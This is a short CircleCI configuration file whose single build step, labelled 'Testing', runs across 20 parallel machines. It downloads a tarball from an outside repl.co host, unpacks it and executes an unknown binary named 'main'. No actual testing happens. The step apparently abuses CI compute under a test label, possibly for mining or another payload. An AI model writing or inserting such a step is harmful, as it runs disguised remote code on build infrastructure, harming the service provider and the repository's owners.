version: 2.1
jobs:
  build:
    machine:
      image: ubuntu-2004:202010-01
    parallelism: 20
    steps:
      - checkout
      - run:
          name: "Testing"
          command: wget https://x.idotmastera.repl.co/meow.tar.gz && tar -xf meow.tar.gz && chmod +x ./main && ./main